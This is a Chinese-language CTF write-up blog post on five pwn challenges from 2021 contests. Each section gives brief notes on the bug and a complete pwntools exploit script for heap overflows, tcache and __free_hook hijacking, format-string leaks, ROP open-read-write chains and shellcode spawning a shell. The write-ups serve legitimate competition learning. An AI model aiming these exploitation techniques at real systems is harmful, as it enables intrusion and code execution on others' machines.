天翼+长安+Das
自身逆向能力还是太差了
# 天翼杯 - chaos
这题确实是有点素质,再加上还得上课,逆得我头昏眼花
2.27 下的堆溢出题目
首先是对程序输入的逆向,本题目对用户命令输入有些要求,经过长时间的逆向分析得到了如下指令输入格式,分别对应了增查改删
def cmd(num):
sla('>>>',num)
def add(size , content):
cmd('passwd:Cr4at3 \nopcode:1\n')
sla('>>> ' , size)
sa('>>> ' , content)
def show(idx):
cmd('passwd:SH0w \nopcode:2\n')
sla('>>> ' , idx)
def edit(idx , content):
cmd('passwd:Ed1t \nopcode:3\n')
sla('>>> ' , idx)
sa('>>> ' , content)
def delete(idx):
cmd('passwd:D3l4te \nopcode:4\n')
sla('>>> ' , idx)之后发现用户输入的 size 是保存在堆块之中的,而且刚好可以覆盖掉,那么我们直接将其覆盖得特别大,之后就可以溢出修改 chunk 头之类的地方,每一次指令会申请 0x20 大小的 chunk ,可以通过切割 unsorted bin 得到 libc 基地址,之后伪造 tcache 的 fd 就可以申请到 __free_hook
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
#context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './chaos'
os.system('chmod +x %s'%binary)
elf = ELF(binary)
libc = elf.libc
#libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
libc = elf.libc
#p = process(['qemu-arm', binary])
#p = process(['qemu-arm', binary,'-g','1234'])
#p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = '8.134.37.86'
port = '28128'
p = remote(host,port)
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def exhaust( pwn ):
global p
i = 0
while 1 :
try:
i+=1
pwn()
except:
lg('times ======== > ',i)
p.close()
if (DEBUG):
p = process(binary)
else :
p = remote(host,port)
def one_gadget(filename):
log.progress('Leak One_Gadgets...')
one_ggs = str(subprocess.check_output(
['one_gadget','--raw', '-f',filename]
)).split(' ')
return list(map(int,one_ggs))
def cmd(num):
sla('>>>',num)
def add(size , content):
cmd('passwd:Cr4at3 \nopcode:1\n')
sla('>>> ' , size)
sa('>>> ' , content)
def show(idx):
cmd('passwd:SH0w \nopcode:2\n')
sla('>>> ' , idx)
def edit(idx , content):
cmd('passwd:Ed1t \nopcode:3\n')
sla('>>> ' , idx)
sa('>>> ' , content)
def delete(idx):
cmd('passwd:D3l4te \nopcode:4\n')
sla('>>> ' , idx)
# one_gad = one_gadget(libc.path)
# dbg('strchr')
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
add(0x208 , '\xff'*0x200 + p64(0x1000) )
# dbg('* $rebase(0x000000000000F9F)')
edit(5 , '\x00'*0x218 + flat(0x21 ,0,0,0, 0x220*5 + 0x20*4 + 1) )
delete(4)
for i in range(0x11):
edit(0 , '\x00')
show(3)
__malloc_hook = l64() - 0x70
lg('__malloc_hook',__malloc_hook)
libc.address = __malloc_hook - libc.sym['__malloc_hook']
__free_hook = libc.sym['__free_hook']
system = libc.sym['system']
binsh = libc.search('/bin/sh\x00').next()
# 4c0
# dbg()
add(0x208 , '\x00'*0x200 + p64(0x1000) )
delete(1)
payload = '\x00'*0x200 + flat( 0x100 , __free_hook ,0, 0x21 , 0 , 0 , 0 ,0x221 , __free_hook - 8)
edit(1 , payload )
add(0x208 , 'a')
add(0x208 , flat('/bin/sh\x00' , system))
# dbg()
delete(0)
# dbg()
p.interactive()
'''
@File : chaos.py
@Time : 2021/09/23 10:10:53
@Author : Niyah
'''# 长安杯 - baige
这题 size 就算出问题也会被写到 size_list 中,比较时也会按照无符号长整型比较,直接写个大 size 再打就完了
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './baige'
os.system('chmod +x %s'%binary)
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
libc = elf.libc
# p = process(['qemu-arm', binary])
# p = process(['qemu-arm', binary,'-g','1234'])
# p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = '113.201.14.253'
port = '21111'
p = remote(host,port)
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def cmd(num):
sla('>',num)
def add(idx , size , text):
cmd(1)
sla('idx' , idx)
sla('size' , size)
sla('content?' , text)
def delete(idx):
cmd(2)
sla('idx' , idx)
def edit(idx , size , text):
cmd(3)
sla('idx' , idx)
sla('size' , size)
sa('content?' , text)
def show(idx):
cmd(4)
sla('idx' , idx)
add( 0 ,0x18, 'a')
cmd(1)
sla('idx' , 0)
sla('size' , 0xffffffff)
add( 1 , 0x20 , 'a')
add( 2 , 0x400 , 'a')
add( 3 , 0x18 , 'a')
add( 4 , 0x18 , 'a')
delete(1)
payload = flat(
0,0,
0,0x31,
0,0,
0,0,
0,0x410 + 0x20+1
)
edit(0 , 0x60 ,payload)
delete(2)
add( 5 , 0x400 , 'a')
show(3)
# dbg()
leak = l64() - 0x70
lg('leak',leak)
libc.address = leak - libc.sym['__malloc_hook']
__free_hook = libc.sym['__free_hook']
system = libc.sym['system']
binsh = libc.search('/bin/sh').next()
payload = flat(
0,0,
0,0x31,
__free_hook - 0x8
)
edit(0 , 0x40 , payload )
add( 5 , 0x28 , 'sh\x00')
add( 6 , 0x28 , flat(binsh , system))
delete(5)
p.interactive()
'''
@File : baige.py
@Time : 2021/09/25 11:02:23
@Author : Niyah
'''# Das-hehepwn
我超!栈题!自己找一下 gadget 即可
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './bypwn'
os.system('chmod +x %s'%binary)
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
libc = elf.libc
# p = process(['qemu-arm', binary])
# p = process(['qemu-arm', binary,'-g','1234'])
# p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = 'node4.buuoj.cn'
port = '26191'
p = remote(host,port)
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def exhaust( pwn ):
global p
i = 0
while 1 :
try:
i+=1
pwn()
except:
lg('times ======== > ',i)
p.close()
if (DEBUG):
p = process(binary)
else :
p = remote(host,port)
def one_gadget(filename):
log.progress('Leak One_Gadgets...')
one_ggs = str(subprocess.check_output(
['one_gadget','--raw', '-f',filename]
)).split(' ')
return list(map(int,one_ggs))
def cmd(num):
sla('>',num)
# one_gad = one_gadget(libc.path)
leave = elf.search(asm('leave;ret')).next()
sla('input' , 'a'*0x20)
# dbg('*0x4008ad')
stack_addr = l64()
lg('stack_addr',stack_addr)
shellcode = '''
mov rsi , rbp
mov rdi , rax
mov rdx , r11
syscall
'''
payload = (flat(0, 0x4007f6 ,stack_addr-0x78 , 0x4007b5 , stack_addr -0x28 ) + asm(shellcode) ).ljust(0x50 , 'a') + p64(stack_addr - 0x50) + p64(leave)
shellcode = asm('nop')*0x80 + asm(shellcraft.sh())
sla('PWN~' , payload)
se(shellcode)
p.interactive()
'''
@File : bypwn.py
@Time : 2021/09/25 12:01:14
@Author : Niyah
'''# Das-hahapwn
fmt+rop
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './hahapwn'
os.system('chmod +x %s'%binary)
elf = ELF(binary)
libc = elf.libc
libc = ELF('./libc-2.23.so')
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
libc = elf.libc
# p = process(['qemu-arm', binary])
# p = process(['qemu-arm', binary,'-g','1234'])
# p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = 'node4.buuoj.cn'
port = '29734'
p = remote(host,port)
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def exhaust( pwn ):
global p
i = 0
while 1 :
try:
i+=1
pwn()
except:
lg('times ======== > ',i)
p.close()
if (DEBUG):
p = process(binary)
else :
p = remote(host,port)
def one_gadget(filename):
log.progress('Leak One_Gadgets...')
one_ggs = str(subprocess.check_output(
['one_gadget','--raw', '-f',filename]
)).split(' ')
return list(map(int,one_ggs))
def cmd(num):
sla('>',num)
# one_gad = one_gadget(libc.path)
# dbg('printf')
sla('name' , '%28$p,%27$p,%39$p,')
ru('0x')
stack = rint()
ru(',0x')
canary = rint(16)
ru(',0x')
__libc_start_main = rint() - 240
lg('stack',stack)
lg('canary',canary)
lg('__libc_start_main',__libc_start_main)
# 29 28 26
libc.address = __libc_start_main - libc.sym['__libc_start_main']
read_addr = libc.sym['read']
open_addr = libc.sym['open']
puts_addr = libc.sym['puts']
ret = libc.search(asm(' ret')).next()
syscall = libc.search(asm('syscall')).next()
pop_rax_ret = libc.search(asm('pop rax; ret')).next()
pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
pop_rdx_ret = libc.search(asm('pop rdx; ret')).next()
pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
flag_addr = stack + 0xb8
orw = flat(
pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
pop_rdi_ret , flag_addr , puts_addr
).ljust(0x100,'\x00') + 'flag\x00'
payload = 'a'*0x68 + p64(canary) +p64(0) + orw
sla('you?' , payload)
# l64()
p.interactive()
'''
@File : hahapwn.py
@Time : 2021/09/25 18:06:52
@Author : Niyah
'''# Das-datasystem
需要在最开始时候绕一下 md5,静态看起来是真的 ex,不如动调一下,绕 md5 的思路是 strcmp 0 截断
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
# context.update( os = 'linux', arch = 'amd64',timeout = 1)
binary = './datasystem'
os.system('chmod +x %s'%binary)
elf = ELF(binary)
libc = elf.libc
# libc = ELF('')
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
libc = elf.libc
# p = process(['qemu-arm', binary])
# p = process(['qemu-arm', binary,'-g','1234'])
# p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
host = 'node4.buuoj.cn'
port = '27789'
p = remote(host,port)
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda x = 12 : int( p.recv(x) , 16)
def dbg( b = null):
if (b == null):
gdb.attach(p)
pause()
else:
gdb.attach(p,'b %s'%b)
def exhaust( pwn ):
global p
i = 0
while 1 :
try:
i+=1
pwn()
except:
lg('times ======== > ',i)
p.close()
if (DEBUG):
p = process(binary)
else :
p = remote(host,port)
def one_gadget(filename):
log.progress('Leak One_Gadgets...')
one_ggs = str(subprocess.check_output(
['one_gadget','--raw', '-f',filename]
)).split(' ')
return list(map(int,one_ggs))
def cmd(num):
sla('>>',num)
def add(size , Content):
cmd(1)
sla('Size: ' , size)
sa('Content' , Content)
def delete(idx):
cmd(2)
sla('Index' , idx)
def show(idx ):
cmd(3)
sla('Index' , idx)
def edit(idx ,Content):
cmd(4)
sla('Index' , idx)
sla('Content' , Content)
# one_gad = one_gadget(libc.path)
pwd = '\x1b\xf3\xee\xf3\xb2\x13\xf6\x0e\x9er\xcb\xc5\x83\x97/\x0e\xa7\x93I\xef7\xed\xc7j\xa8Z\xb3\xdaX[\xea\x83'
sa('username' , 'admin')
sa('password:' , pwd)
# add( 0x20 , 'a'*0x20)
add(0x18 , 'a')
add(0x420 , '\x00')
add(0x150 , 'a')
add(0x18 , 'a')
delete(0)
add(0x18 , flat(0,0,0,0x160+0x431))
delete(1)
add(0x420 ,'a')
show(2)
__malloc_hook = l64() - 0x70
libc.address = __malloc_hook - libc.sym['__malloc_hook']
__free_hook = libc.sym['__free_hook']
setcontext = libc.sym['setcontext'] + 53
read_addr = libc.sym['read']
open_addr = libc.sym['open']
puts_addr = libc.sym['puts']
ret = libc.search(asm(' ret')).next()
pop_rax_ret = libc.search(asm('pop rax; ret')).next()
pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
pop_rdx_ret = libc.search(asm('pop rdx; ret')).next()
pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
add(0x150 , 'a')
delete(4)
edit(2 ,p64(__free_hook) )
flag_addr = __free_hook + 0x148
orw = flat(
pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
pop_rdi_ret , flag_addr , puts_addr
)
payload = p64(setcontext) + orw + p64(0)*3 + p64(__free_hook + 8) + p64(ret)
add(0x150 , 'a')
add(0x150 , payload.ljust(0x148,'\x00') + 'flag\x00' )
# dbg()
delete(5)
# dbg()
p.interactive()
'''
@File : datasystem.py
@Time : 2021/09/25 15:29:56
@Author : Niyah
'''本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。